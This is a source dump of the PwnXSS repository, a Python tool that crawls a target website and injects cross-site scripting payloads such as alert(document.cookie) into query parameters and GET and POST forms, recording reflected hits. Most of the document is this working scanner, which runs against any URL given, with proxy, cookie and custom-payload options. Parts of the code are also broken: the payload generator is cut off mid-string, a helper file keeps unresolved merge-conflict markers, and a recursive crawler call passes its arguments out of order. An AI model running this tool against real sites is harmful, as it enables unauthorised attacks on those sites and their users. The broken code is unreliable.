├── .github ├── FUNDING.yml └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── LICENSE ├── README.md ├── images ├── logo.png └── screenshot.png ├── lib ├── core.py ├── crawler │ └── crawler.py └── helper │ ├── Log.py │ └── helper.py ├── pwnxss.py └── requirements.txt /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | ko_fi: duckoverflow 2 | custom: ["https://www.paypal.com/paypalme/auliarakheen", "https://saweria.co/duckoverflow"] 3 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 menkrep1337 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 |
3 | A powerful XSS scanner made in python 3.7
4 | 5 | 6 | ## Installing 7 | 8 | Requirements:
9 | 10 |

  • BeautifulSoup4
  • 11 | 12 | ```bash 13 | pip install bs4 14 | ``` 15 |
  • requests
  • 16 | 17 | ```bash 18 | pip install requests 19 | ``` 20 |
  • python 3.7
  • 21 |
    22 | Commands: 23 | 24 | ```bash 25 | git clone https://github.com/pwn0sec/PwnXSS 26 | chmod 755 -R PwnXSS 27 | cd PwnXSS 28 | python3 pwnxss.py --help 29 | ``` 30 | ## Usage 31 | Basic usage: 32 | 33 | ```bash 34 | python3 pwnxss.py -u http://testphp.vulnweb.com 35 | ``` 36 |
    37 | Advanced usage: 38 | 39 | ```bash 40 | python3 pwnxss.py --help 41 | ``` 42 | 43 | ## Main features 44 | 45 | * crawling all links on a website ( crawler engine ) 46 | * POST and GET forms are supported 47 | * many settings that can be customized 48 | * Advanced error handling 49 | * Multiprocessing support.✔️ 50 | * ETC.... 51 | 52 | 53 | ## Screenshot 54 | 55 | 56 | 57 | ## Roadmap 58 | 59 | v0.3B: 60 | ------ 61 |
  • Added custom options ( --proxy, --user-agent etc... )
  • 62 |
    63 | 64 | v0.3B Patch: 65 | ------ 66 |
  • Added support for ( form method GET )
  • 67 | 68 | v0.4B: 69 | ------ 70 |
  • Improved Error handling
  • 71 |
  • Now Multiple parameters for GET method is Supported
  • 72 | 73 | v0.5 Release (Final): 74 | ------ 75 | * Bug fixed 76 | * Now cookies is supported. (--cookie {}) 77 | ## Note 78 | * Sorry for my bad english 79 | * if you run pwnxss on the win10 terminal you will get an untidy output 80 | * now it doesn't support DOM 81 | 82 | -------------------------------------------------------------------------------- /images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn0sec/PwnXSS/4f75e6a99d24d7fc8836aa1cdf83472f79925528/images/logo.png -------------------------------------------------------------------------------- /images/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn0sec/PwnXSS/4f75e6a99d24d7fc8836aa1cdf83472f79925528/images/screenshot.png -------------------------------------------------------------------------------- /lib/core.py: -------------------------------------------------------------------------------- 1 | from lib.helper.helper import * 2 | from random import randint 3 | from bs4 import BeautifulSoup 4 | from urllib.parse import urljoin,urlparse,parse_qs,urlencode 5 | from lib.helper.Log import * 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 8 | 9 | class core: 10 | 11 | @classmethod 12 | def generate(self,eff): 13 | FUNCTION=[ 14 | "prompt(5000/200)", 15 | "alert(6000/3000)", 16 | "alert(document.cookie)", 17 | "prompt(document.cookie)", 18 | "console.log(5000/3000)" 19 | ] 20 | if eff == 1: 21 | return "" 37 | 38 | @classmethod 39 | def post_method(self): 40 | bsObj=BeautifulSoup(self.body,"html.parser") 41 | forms=bsObj.find_all("form",method=True) 42 | 43 | for form in forms: 44 | try: 45 | action=form["action"] 46 | except KeyError: 47 | action=self.url 48 | 49 | if form["method"].lower().strip() == "post": 50 | Log.warning("Target have form with POST method: "+C+urljoin(self.url,action)) 51 | Log.info("Collecting form input key.....") 52 | 53 | keys={} 54 | for key in form.find_all(["input","textarea"]): 55 | try: 56 | if key["type"] == "submit": 57 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"") 58 | keys.update({key["name"]:key["name"]}) 59 | 60 | else: 61 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload) 62 | keys.update({key["name"]:self.payload}) 63 | 64 | except Exception as e: 65 | Log.info("Internal error: "+str(e)) 66 | 67 | Log.info("Sending payload (POST) method...") 68 | req=self.session.post(urljoin(self.url,action),data=keys) 69 | if self.payload in req.text: 70 | Log.high("Detected XSS (POST) at "+urljoin(self.url,req.url)) 71 | file = open("xss.txt", "a") 72 | file.write(str(req.url)+"\n\n") 73 | file.close() 74 | Log.high("Post data: "+str(keys)) 75 | else: 76 | Log.info("Parameter page using (POST) payloads but not 100% yet...") 77 | 78 | @classmethod 79 | def get_method_form(self): 80 | bsObj=BeautifulSoup(self.body,"html.parser") 81 | forms=bsObj.find_all("form",method=True) 82 | 83 | for form in forms: 84 | try: 85 | action=form["action"] 86 | except KeyError: 87 | action=self.url 88 | 89 | if form["method"].lower().strip() == "get": 90 | Log.warning("Target have form with GET method: "+C+urljoin(self.url,action)) 91 | Log.info("Collecting form input key.....") 92 | 93 | keys={} 94 | for key in form.find_all(["input","textarea"]): 95 | try: 96 | if key["type"] == "submit": 97 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"") 98 | keys.update({key["name"]:key["name"]}) 99 | 100 | else: 101 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload) 102 | keys.update({key["name"]:self.payload}) 103 | 104 | except Exception as e: 105 | Log.info("Internal error: "+str(e)) 106 | try: 107 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload) 108 | keys.update({key["name"]:self.payload}) 109 | except KeyError as e: 110 | Log.info("Internal error: "+str(e)) 111 | 112 | Log.info("Sending payload (GET) method...") 113 | req=self.session.get(urljoin(self.url,action),params=keys) 114 | if self.payload in req.text: 115 | Log.high("Detected XSS (GET) at "+urljoin(self.url,req.url)) 116 | file = open("xss.txt", "a") 117 | file.write(str(req.url)+"\n\n") 118 | file.close() 119 | Log.high("GET data: "+str(keys)) 120 | else: 121 | Log.info("\033[0;35;47m Parameter page using (GET) payloads but not 100% yet...") 122 | 123 | @classmethod 124 | def get_method(self): 125 | bsObj=BeautifulSoup(self.body,"html.parser") 126 | links=bsObj.find_all("a",href=True) 127 | for a in links: 128 | url=a["href"] 129 | if url.startswith("http://") is False or url.startswith("https://") is False or url.startswith("mailto:") is False: 130 | base=urljoin(self.url,a["href"]) 131 | query=urlparse(base).query 132 | if query != "": 133 | Log.warning("Found link with query: "+G+query+N+" Maybe a vuln XSS point") 134 | 135 | query_payload=query.replace(query[query.find("=")+1:len(query)],self.payload,1) 136 | test=base.replace(query,query_payload,1) 137 | 138 | query_all=base.replace(query,urlencode({x: self.payload for x in parse_qs(query)})) 139 | 140 | Log.info("Query (GET) : "+test) 141 | Log.info("Query (GET) : "+query_all) 142 | 143 | if not url.startswith("mailto:") and not url.startswith("tel:"): 144 | _respon=self.session.get(test,verify=False) 145 | if self.payload in _respon.text or self.payload in self.session.get(query_all).text: 146 | Log.high("Detected XSS (GET) at "+_respon.url) 147 | file = open("xss.txt", "a") 148 | file.write(str(_respon.url)+"\n\n") 149 | file.close() 150 | 151 | else: 152 | Log.info("Parameter page using (GET) payloads but not 100% yet...") 153 | else: 154 | Log.info("URL is not an HTTP url, ignoring") 155 | 156 | @classmethod 157 | def main(self,url,proxy,headers,payload,cookie,method=2): 158 | 159 | print(W+"*"*15) 160 | self.payload=payload 161 | self.url=url 162 | 163 | self.session=session(proxy,headers,cookie) 164 | Log.info("Checking connection to: "+Y+url) 165 | try: 166 | ctr=self.session.get(url) 167 | self.body=ctr.text 168 | except Exception as e: 169 | Log.high("Internal error: "+str(e)) 170 | return 171 | 172 | if ctr.status_code > 400: 173 | Log.info("Connection failed "+G+str(ctr.status_code)) 174 | return 175 | else: 176 | Log.info("Connection estabilished "+G+str(ctr.status_code)) 177 | 178 | if method >= 2: 179 | self.post_method() 180 | self.get_method() 181 | self.get_method_form() 182 | 183 | elif method == 1: 184 | self.post_method() 185 | 186 | elif method == 0: 187 | self.get_method() 188 | self.get_method_form() 189 | -------------------------------------------------------------------------------- /lib/crawler/crawler.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from lib.helper.Log import * 3 | from lib.helper.helper import * 4 | from lib.core import * 5 | from bs4 import BeautifulSoup 6 | from urllib.parse import urljoin 7 | from multiprocessing import Process 8 | 9 | class crawler: 10 | 11 | visited=[] 12 | 13 | @classmethod 14 | def getLinks(self,base,proxy,headers,cookie): 15 | 16 | lst=[] 17 | 18 | conn=session(proxy,headers,cookie) 19 | text=conn.get(base).text 20 | isi=BeautifulSoup(text,"html.parser") 21 | 22 | 23 | for obj in isi.find_all("a",href=True): 24 | url=obj["href"] 25 | 26 | 27 | if urljoin(base,url) in self.visited: 28 | continue 29 | 30 | elif url.startswith("mailto:") or url.startswith("javascript:"): 31 | continue 32 | # :// will check if there any subdomain or any other domain but it will pass directory 33 | elif url.startswith(base) or "://" not in url : 34 | lst.append(urljoin(base,url)) 35 | self.visited.append(urljoin(base,url)) 36 | 37 | return lst 38 | 39 | @classmethod 40 | def crawl(self,base,depth,proxy,headers,level,method,cookie): 41 | 42 | urls=self.getLinks(base,proxy,headers,cookie) 43 | 44 | for url in urls: 45 | if url.startswith("https://") or url.startswith("http://"): 46 | p=Process(target=core.main, args=(url,proxy,headers,level,cookie,method)) 47 | p.start() 48 | p.join() 49 | if depth != 0: 50 | self.crawl(url,depth-1,base,proxy,level,method,cookie) 51 | 52 | else: 53 | break 54 | -------------------------------------------------------------------------------- /lib/helper/Log.py: -------------------------------------------------------------------------------- 1 | ''' 2 | PwnXSS - 2019/2020 3 | This project was created by Andripwn with Pwn0sec team. 4 | Copyright under the MIT license 5 | ''' 6 | from lib.helper.helper import * 7 | from datetime import datetime 8 | class Log: 9 | 10 | @classmethod 11 | def info(self,text): 12 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+G+"INFO"+N+"] "+text) 13 | 14 | @classmethod 15 | def warning(self,text): 16 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+Y+"WARNING"+N+"] "+text) 17 | 18 | @classmethod 19 | def high(self,text): 20 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+R+"CRITICAL"+N+"] "+text) 21 | -------------------------------------------------------------------------------- /lib/helper/helper.py: -------------------------------------------------------------------------------- 1 | ''' 2 | XSSCon - 2019/2020 3 | This project was created by menkrep1337 with 407Aex team. 4 | Copyright under the MIT license 5 | ''' 6 | import requests, json 7 | ##### Warna ####### 8 | N = '\033[0m' 9 | W = '\033[1;37m' 10 | B = '\033[1;34m' 11 | M = '\033[1;35m' 12 | R = '\033[1;31m' 13 | G = '\033[1;32m' 14 | Y = '\033[1;33m' 15 | C = '\033[1;36m' 16 | ##### Styling ###### 17 | underline = "\033[4m" 18 | ##### Default ###### 19 | agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} 20 | line="—————————————————" 21 | ##################### 22 | def session(proxies,headers,cookie): 23 | r=requests.Session() 24 | r.proxies=proxies 25 | r.headers=headers 26 | r.cookies.update(json.loads(cookie)) 27 | return r 28 | 29 | logo=G+"""██████╗ ██╗ ██╗███╗ ██╗██╗ ██╗███████╗███████╗ 30 | ██╔══██╗██║ ██║████╗ ██║╚██╗██╔╝██╔════╝██╔════╝ 31 | ██████╔╝██║ █╗ ██║██╔██╗ ██║ ╚███╔╝ ███████╗███████╗ %s 32 | ██╔═══╝ ██║███╗██║██║╚██╗██║ ██╔██╗ ╚════██║╚════██║ %s 33 | ██║ ╚███╔███╔╝██║ ╚████║██╔╝ ██╗███████║███████║ 34 | ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚══════╝ 35 | <<<<<<< STARTING >>>>>>> 36 | """%(R+"{v0.5 Final}"+G,underline+C+"https://github.com/pwn0sec/PwnXSS"+N+G) 37 | 38 | ##======= 39 | """%(R+"{v0.5 Final}"+G,underline+C+"https://github.com/pwn0sec/PwnXSS"+N+G) 40 | 41 | >>>>>>> branch 'master' of https://github.com/pwn0sec/PwnXSS 42 | """ 43 | -------------------------------------------------------------------------------- /pwnxss.py: -------------------------------------------------------------------------------- 1 | ''' 2 | PwnXSS - 2019/2020 3 | This project was created by Andripwn with Pwn0sec team. 4 | Copyright under the MIT license 5 | ''' 6 | import argparse 7 | from lib.helper.helper import * 8 | from lib.helper.Log import * 9 | from lib.core import * 10 | from random import randint 11 | from lib.crawler.crawler import * 12 | epilog=""" 13 | Github: https://www.github.com/pwn0sec/PwnXSS 14 | Version: 0.5 Final 15 | """ 16 | def check(getopt): 17 | payload=int(getopt.payload_level) 18 | if payload > 6 and getopt.payload is None: 19 | Log.info("Do you want use custom payload (Y/n)?") 20 | answer=input("> "+W) 21 | if answer.lower().strip() == "y": 22 | Log.info("Write the XSS payload below") 23 | payload=input("> "+W) 24 | else: 25 | payload=core.generate(randint(1,6)) 26 | 27 | else: 28 | payload=core.generate(payload) 29 | 30 | return payload if getopt.payload is None else getopt.payload 31 | 32 | def start(): 33 | parse=argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,usage="PwnXSS -u [options]",epilog=epilog,add_help=False) 34 | 35 | pos_opt=parse.add_argument_group("Options") 36 | pos_opt.add_argument("--help",action="store_true",default=False,help="Show usage and help parameters") 37 | pos_opt.add_argument("-u",metavar="",help="Target url (e.g. http://testphp.vulnweb.com)") 38 | pos_opt.add_argument("--depth",metavar="",help="Depth web page to crawl. Default: 2",default=2) 39 | pos_opt.add_argument("--payload-level",metavar="",help="Level for payload Generator, 7 for custom payload. {1...6}. Default: 6",default=6) 40 | pos_opt.add_argument("--payload",metavar="",help="Load custom payload directly (e.g. )",default=None) 41 | pos_opt.add_argument("--method",metavar="",help="Method setting(s): \n\t0: GET\n\t1: POST\n\t2: GET and POST (default)",default=2,type=int) 42 | pos_opt.add_argument("--user-agent",metavar="",help="Request user agent (e.g. Chrome/2.1.1/...)",default=agent) 43 | pos_opt.add_argument("--single",metavar="",help="Single scan. No crawling just one address") 44 | pos_opt.add_argument("--proxy",default=None,metavar="",help="Set proxy (e.g. {'https':'https://10.10.1.10:1080'})") 45 | pos_opt.add_argument("--about",action="store_true",help="Print information about PwnXSS tool") 46 | pos_opt.add_argument("--cookie",help="Set cookie (e.g {'ID':'1094200543'})",default='''{"ID":"1094200543"}''',metavar="") 47 | 48 | getopt=parse.parse_args() 49 | print(logo) 50 | Log.info("Starting PwnXSS...") 51 | if getopt.u: 52 | core.main(getopt.u,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method) 53 | 54 | crawler.crawl(getopt.u,int(getopt.depth),getopt.proxy,getopt.user_agent,check(getopt),getopt.method,getopt.cookie) 55 | 56 | elif getopt.single: 57 | core.main(getopt.single,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method) 58 | 59 | elif getopt.about: 60 | print(""" 61 | *************** 62 | Project: PwnXSS 63 | License: MIT 64 | Author: Security Executions Code 65 | Last updates: 2019 may 26 66 | Note: Take your own RISK 67 | **************** 68 | """+epilog) 69 | else: 70 | parse.print_help() 71 | 72 | if __name__=="__main__": 73 | start() 74 | 75 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | bs4 >= 0.0.1 2 | requests >= 2.0.0 --------------------------------------------------------------------------------